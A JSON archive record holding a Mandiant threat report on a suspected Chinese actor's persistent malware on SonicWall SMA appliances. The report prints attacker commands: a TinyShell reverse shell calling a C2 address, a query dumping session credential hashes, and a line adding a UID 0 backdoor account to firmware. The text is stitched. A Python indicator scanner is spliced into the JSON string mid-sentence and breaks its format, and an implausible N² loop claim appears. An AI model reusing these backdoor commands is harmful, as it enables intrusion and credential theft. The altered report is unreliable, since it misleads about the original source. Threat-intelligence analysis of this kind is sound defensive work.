{
	"id": "3b4f5aef-1fdc-40d4-ae72-3051c3e84c22",
	"created_at": "2026-04-06T00:09:47.931286Z",
	"updated_at": "2026-04-10T03:22:38.59548Z",
	"deleted_at": null,
	"sha1_hash": "10d613b8c6a00696dbae386eabeac0f93b46c252",
	"title": "Suspected Chinese Campaign to Persist on SonicWall Devices, Highlights Importance of Monitoring Edge Devices",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 66689,
	"plain_text": "Suspected Chinese Campaign to Persist on SonicWall Devices, Highlights Importance of Monitoring Edge Devices\r\nBy Mandiant\r\nPublished: 2023-03-08 · Archived: 2026-04-02 10:37:32 UTC\r\nWritten by: Daniel Lee, Stephen Eckels, Ben Read\r\n\r\nMandiant, working in partnership with the SonicWall Product Security and Incident Response Team (PSIRT), has identified a suspected Chinese campaign that maintains long-term persistence by running malware on an unpatched SonicWall Secure Mobile Access (SMA) appliance. The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades. Mandiant currently tracks this actor as UNC4540.\r\n\r\nMalware\r\n\r\nAnalysis of a compromised device revealed a collection of files that give the attacker highly privileged, readily available access to the appliance. The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the suite of malicious bash scripts shows a detailed understanding of the appliance and is well tailored to the system to provide stability and persistence. Table 1 contains a list of the malicious files.\r\n\r\nPath | Hash (MD5) | Function\r\n/bin/firewalld | e4117b17e3d14fe64f45750be71dbaa6 | Main malware process\r\n/bin/httpsd | 2d57bcb8351cf2b57c4fd2d1bb8f862e | TinyShell backdoor\r\n/etc/rc.d/rc.local | 559b9ae2a578e1258e80c45a5794c071 | Boot persistence for firewalld\r\n/bin/iptabled | 8dbf1effa7bc94fc0b9b4ce83dfce2e6 | Redundant main malware process\r\n/bin/geoBotnetd | 619769d3d40a3c28ec83832ca521f521 | Firmware backdoor script\r\n/bin/ifconfig6 | fa1bf2e427b2defffd573854c35d4919 | Graceful shutdown script\r\nTable 1: Malware files\r\n\r\nMain Module\r\n\r\nThe main malware entry point is a bash script named firewalld, whose primary loop body runs once per ordered pair of files on the system: the loop is nested as … for j in $(ls / -R) do for i in $(ls / -R) do: …, so with N files on the appliance the body executes N² times. The script is responsible for executing an SQL command to accomplish credential stealing and for launching the other components.\r\nhttps://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall\r\nPage 1 of 4\r\n\r\nThe first function in firewalld executes the TinyShell backdoor httpsd with the command nohup /bin/httpsd -c\u003cC2 IP ADDRESS\u003e -d 5 -m -1 -p 51432 \u003e /dev/null 2\u003e\u00261 \u0026 if the httpsd process isn’t already running. This sets TinyShell to reverse-shell mode, instructing it to call out to the given IP address and port at a specific time and day represented by the -m flag, with a beacon interval defined by the -d flag. The binary embeds a hard-coded IP address, which is used in reverse-shell mode if the IP address argument is left blank. It also has a listening bind-shell mode available.\r\n\r\nPrimary Purpose is Likely Credential Theft\r\n\r\nThe primary purpose of the malware appears to be to steal hashed credentials from all logged-in users. It does this in firewalld by routinely executing the SQL query select userName,password from Sessions against the sqlite3 database /tmp/temp.db and writing the results to the attacker-created text file /tmp/syslog.db. The source database /tmp/temp.db is used by the appliance to track session information, including hashed credentials. Once retrieved by the attacker, the hashes could be cracked offline.\r\n\r\nImplementation Shows Emphasis on Persistence and Stability\r\n\r\nThe attackers put significant effort into the stability and persistence of their tooling. This allows their access to persist through firmware updates and maintains a foothold on the network through the SonicWall device.\r\n\r\nRedundant Scripts\r\n\r\nThe startup script rc.local runs firewalld at boot time, but the efforts to ensure stability and persistence extend beyond that, with functionality designed to enable long-term attacker access. A second copy of firewalld, named iptabled, was also present on the device. iptabled was modified to provide persistence for the main malware process in case of exit or crash: each of the two scripts was configured to start the other if it was not running, providing a backup instance of the main malware process and therefore an additional layer of resilience.\r\n\r\nFirmware Updates Modified to Allow Persistence, Create New Root\r\n\r\nIn addition to ensuring stability, the attackers implemented a process for ensuring their access would persist across firmware updates. The bash script geoBotnetd checks every ten seconds for a new firmware upgrade to appear at /cf/FIRMWARE/NEW/INITRD.GZ. If one does, the script copies the file for backup, unzips it, mounts it, and then copies the whole package of malware files into it. geoBotnetd also executes echo -e \"acme:wegB/YNBuL7QI:0:0:pwned:/acme:/bin/bash\\n\" \u003e\u003e /sda/etc/passwd, which adds the backdoor user acme with UID 0 and GID 0 (i.e. a second root) to the mounted image. Then it rezips everything and puts it back in place with all the malware included, ready for installation. The technique is not especially sophisticated, but it does show considerable effort on the part of the attacker to understand the appliance update cycle, then develop and test a method for persistence.\r\n\r\nThe techniques used here, including backdooring update archives and modifying appliance binaries, are consistent with those described in Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices, although Mandiant tracks these threats separately.\r\n\r\nThese firmware manipulations only occurred post-exploitation on an already infected device and were not seen used in a supply chain attack.\r\n\r\nPatch Applied to Binary, Potentially to Increase Stability\r\n\r\nIn a similar vein that shows the effort put into tailoring the malware, the main firewalld script includes a function that applies a small patch to the legitimate SonicWall binary firebased. It uses a simple sed command to replace the string /sbin/shutdown -r now with bash /bin/ifconfig6 in the binary, and then creates the script /bin/ifconfig6 with the following contents:\r\n\r\n#!/bin/sh\r\nifconfig eth0 down\r\nsleep 90\r\n/sbin/shutdown -r now\r\n\r\nMandiant did not delve into detail on how this would affect the appliance or under what conditions it would have an impact, but it is clear from the change that it was intended to take the network interface down and wait before running the shutdown command, i.e. a graceful close-down of the network controller. It is likely that the attackers encountered issues, either in use or in testing, when firebased shut down the appliance.\r\n\r\nLong Term Operation, Initial Infection Vector Unknown\r\n\r\nMandiant was not able to determine the origin of the infection; however, the malware, or a predecessor of it, was likely deployed in 2021. 
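With no evidence of the initial vector, what a responder can actually verify is the artefact set described above: the Table 1 paths and hashes, the acme entry in /etc/passwd, the rc.local hook that starts firewalld, and the shutdown string the sed patch leaves inside firebased. The scanner below is an added example written for this page and is not tooling from Mandiant or SonicWall. It expects the appliance filesystem, or an unpacked INITRD image, mounted read-only at a path you pass in; the finding labels, the file-size cap, the full-tree walk for the patched string and the generalisation from acme to any non-root UID 0 account are this example's own assumptions.

```python
# Added example, not code from the Mandiant post or from SonicWall: an offline
# sweep for the indicators the post describes, run against a mounted appliance
# filesystem or an extracted INITRD image. Paths and MD5 hashes are Table 1 of
# the post; the passwd, rc.local and firebased checks follow the post's text.
# The finding names, the size cap and the walk over the whole tree are this
# example's own assumptions.
import hashlib
import os

# Table 1 of the post: appliance path -> (MD5, description)
KNOWN_FILES = {
    '/bin/firewalld': ('e4117b17e3d14fe64f45750be71dbaa6', 'Main malware process'),
    '/bin/httpsd': ('2d57bcb8351cf2b57c4fd2d1bb8f862e', 'TinyShell backdoor'),
    '/etc/rc.d/rc.local': ('559b9ae2a578e1258e80c45a5794c071', 'Boot persistence for firewalld'),
    '/bin/iptabled': ('8dbf1effa7bc94fc0b9b4ce83dfce2e6', 'Redundant main malware process'),
    '/bin/geoBotnetd': ('619769d3d40a3c28ec83832ca521f521', 'Firmware backdoor script'),
    '/bin/ifconfig6': ('fa1bf2e427b2defffd573854c35d4919', 'Graceful shutdown script'),
}
DUMP_FILE = '/tmp/syslog.db'               # attacker-created dump of session hashes (from the text)
PATCHED_SHUTDOWN = b'bash /bin/ifconfig6'  # what the sed patch writes into firebased
MAX_SCAN_BYTES = 32 * 1024 * 1024          # assumption: do not grep files larger than this


def md5_of(path):
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(1 << 16), b''):
            h.update(chunk)
    return h.hexdigest()


def under(root, appliance_path):
    # Map an appliance-absolute path onto the mount point being scanned.
    return os.path.join(root, appliance_path.lstrip('/'))


def check_known_files(root):
    # Hash match: confirmed hit. Name match with another hash: review by hand,
    # except rc.local, which exists on clean devices and is checked separately.
    findings = []
    for path, (md5, desc) in KNOWN_FILES.items():
        p = under(root, path)
        if not os.path.isfile(p):
            continue
        actual = md5_of(p)
        if actual == md5:
            findings.append(('known_hash', path, desc))
        elif path != '/etc/rc.d/rc.local':
            findings.append(('name_match', path, actual))
    if os.path.isfile(under(root, DUMP_FILE)):
        findings.append(('credential_dump', DUMP_FILE, 'output of select userName,password from Sessions'))
    return findings


def check_rc_local(root):
    # The post: rc.local runs firewalld at boot. Flag any reference to it.
    p = under(root, '/etc/rc.d/rc.local')
    if not os.path.isfile(p):
        return []
    with open(p, 'rb') as f:
        hit = b'firewalld' in f.read()
    return [('rc_local_launches_implant', '/etc/rc.d/rc.local', 'firewalld')] if hit else []


def check_passwd(root):
    # geoBotnetd appends acme:...:0:0:pwned:/acme:/bin/bash to the image's passwd.
    # Generalised: report every UID-0 account that is not root.
    p = under(root, '/etc/passwd')
    if not os.path.isfile(p):
        return []
    findings = []
    with open(p, 'rb') as f:
        for line in f.read().decode('utf-8', 'replace').splitlines():
            fields = line.split(':')
            if len(fields) >= 7 and fields[2] == '0' and fields[0] != 'root':
                findings.append(('extra_uid0_user', '/etc/passwd', fields[0]))
    return findings


def check_patched_binaries(root):
    # The post does not give firebased's path, so look in every regular file for
    # the string the sed patch substitutes for /sbin/shutdown -r now. Files from
    # Table 1 are skipped here because check_known_files already reports them.
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            rel = '/' + os.path.relpath(p, root).replace(os.sep, '/')
            if rel in KNOWN_FILES or rel == DUMP_FILE:
                continue
            if os.path.islink(p) or not os.path.isfile(p) or os.path.getsize(p) > MAX_SCAN_BYTES:
                continue
            with open(p, 'rb') as f:
                if PATCHED_SHUTDOWN in f.read():
                    findings.append(('patched_shutdown_string', rel, PATCHED_SHUTDOWN.decode()))
    return findings


def scan_root(root):
    return (check_known_files(root) + check_rc_local(root)
            + check_passwd(root) + check_patched_binaries(root))


if __name__ == '__main__':
    import sys
    for kind, where, detail in scan_root(sys.argv[1] if len(sys.argv) > 1 else '/'):
        print(kind, where, detail)
```

A known_hash finding is a confirmed match against Table 1; a name_match means a file sits at an implant path with different contents and needs manual review, since a reworked variant would not match the published hashes; extra_uid0_user reports any non-root UID 0 account, not only acme. Run it against a mount point of a copied filesystem or image rather than on the live appliance where possible, given that the post notes direct examination of these devices is difficult.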
Mandiant believes that attacker access has persisted through multiple firmware updates.\r\n\r\nDetect and Defend\r\n\r\nFirst and foremost, maintaining proper patch management is essential for mitigating the risk of vulnerability exploitation. At the time of publishing this blog post, SonicWall urges SMA100 customers to upgrade to 10.2.1.7 or higher, which includes hardening enhancements such as File Integrity Monitoring (FIM) and anomalous process identification. A SonicWall blog post describing the patch features is available (New SMA Release Updates OpenSSL Library, Includes Key Security Features) and the patch itself can be found here: Upgrade Path For SMA100 Series.\r\n\r\nTo help keep customers secure, SMA100 customers on versions 10.2.1.7 or higher will receive notifications in their Management Console about pending CRITICAL security updates.\r\n\r\nGiven the difficulty in directly examining impacted devices, reviewing available logs for secondary signs of compromise, such as abnormal logins or internal traffic, may offer some opportunities for detection. However, applying the recent patch is the best way to limit any unexpected tampering or modification of the appliance.\r\n\r\nA Pattern of Chinese Network Device Compromises\r\n\r\nDeveloping malware for a managed appliance is often no trivial task. Vendors typically do not enable direct access to the operating system or filesystem for users, instead offering administrators a graphical UI or a limited command line interface (CLI) with guardrails that prevent anyone from accidentally breaking the system. Because of this lack of access, attackers require a fair amount of resources and effort to develop exploits and malware for managed devices.\r\n\r\nIn recent years Chinese attackers have deployed multiple zero-day exploits and malware for a variety of internet-facing network appliances as a route to full enterprise intrusion, and the instance reported here is part of a recent pattern that Mandiant expects to continue in the near term. For further information, see the Mandiant blog post Suspected Chinese Threat Actors Exploiting FortiOS Vulnerability (CVE-2022-42475). In particular, the section \"China Continues to Focus on Network Devices\" summarizes some of Mandiant’s recent findings.\r\n\r\nPosted in Threat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall"
	],
	"report_names": [
		"suspected-chinese-persist-sonicwall"
	],
	"threat_actors": [
		{
			"id": "d54d2676-266b-4bf1-b82c-e8fc576f08ff",
			"created_at": "2024-09-20T02:00:04.563465Z",
			"updated_at": "2026-04-10T02:00:03.690637Z",
			"deleted_at": null,
			"main_name": "UNC4540",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC4540",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434187,
	"ts_updated_at": 1775791358,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/10d613b8c6a00696dbae386eabeac0f93b46c252.pdf",
		"text": "https://archive.orkl.eu/10d613b8c6a00696dbae386eabeac0f93b46c252.txt",
		"img": "https://archive.orkl.eu/10d613b8c6a00696dbae386eabeac0f93b46c252.jpg"
	}
}